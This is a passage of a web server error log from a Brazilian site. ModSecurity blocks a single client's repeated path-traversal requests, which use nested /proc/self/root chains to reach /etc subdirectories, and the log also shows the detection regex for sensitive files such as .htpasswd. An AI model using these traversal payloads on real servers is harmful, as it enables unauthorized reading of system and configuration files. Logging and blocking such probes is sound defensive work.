"abggaLABkC4fWIHEf8HoqQAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:22.150246 2026] [:error] [pid 10772:tid 140411540502272] [client 74.7.243.203:34298] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggav9ocpUE4ed4uDzsTwAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:23.477793 2026] [:error] [pid 10772:tid 140411708356352] [client 74.7.243.203:34314] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgga_9ocpUE4ed4uDzsUQAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:25.899505 2026] [:error] [pid 10772:tid 140411725141760] [client 74.7.243.203:34320] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggbf9ocpUE4ed4uDzsVAAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:27.169044 2026] [:error] [pid 21533:tid 140411607643904] [client 74.7.243.203:34330] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggb3jZBu2q05ozVU9V1wAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:28.407247 2026] [:error] [pid 11972:tid 140411548894976] [client 74.7.243.203:34346] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggcJqj1wV0Si-OkefrhAAAABc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:29.606006 2026] [:error] [pid 10772:tid 140411607643904] [client 74.7.243.203:34352] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggcf9ocpUE4ed4uDzsVwAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:30.783511 2026] [:error] [pid 10709:tid 140411674785536] [client 74.7.243.203:37436] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggchXjF1vJNtV6CWrzywAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:32.070962 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.243.203:37438] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggdP9ocpUE4ed4uDzsWQAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:33.411518 2026] [:error] [pid 10772:tid 140411674785536] [client 74.7.243.203:37440] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggdf9ocpUE4ed4uDzsWwAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:34.727077 2026] [:error] [pid 10709:tid 140411540502272] [client 74.7.243.203:37446] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggdhXjF1vJNtV6CWrzzQAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:35.993428 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.243.203:37462] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggd9SswJuvopo3lOhb3QAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:37.318640 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.243.203:37476] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggedSswJuvopo3lOhb3gAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:38.515229 2026] [:error] [pid 10831:tid 140411733534464] [client 74.7.243.203:37482] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggeo6lpbStxTqkSktqQgAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:39.953342 2026] [:error] [pid 32654:tid 140411641214720] [client 74.7.243.203:37494] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggewlT9VtDQc7bgUyu0gAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:41.463579 2026] [:error] [pid 32654:tid 140411582465792] [client 74.7.243.203:35568] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggfQlT9VtDQc7bgUyu0wAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:42.803881 2026] [:error] [pid 11972:tid 140411674785536] [client 74.7.243.203:35574] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggfpqj1wV0Si-OkefrogAAAAg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:44.009359 2026] [:error] [pid 32654:tid 140411699963648] [client 74.7.243.203:35588] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgggAlT9VtDQc7bgUyu1AAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:45.323483 2026] [:error] [pid 21806:tid 140411699963648] [client 74.7.243.203:35594] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgggdSswJuvopo3lOhb4AAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:46.689151 2026] [:error] [pid 10709:tid 140411607643904] [client 74.7.243.203:35604] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggghXjF1vJNtV6CWrz0AAAAdA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:47.975931 2026] [:error] [pid 21533:tid 140411599251200] [client 74.7.243.203:35616] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggg3jZBu2q05ozVU9V2wAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:49.279701 2026] [:error] [pid 21805:tid 140411607643904] [client 74.7.243.203:35624] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgghbABkC4fWIHEf8HorwAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
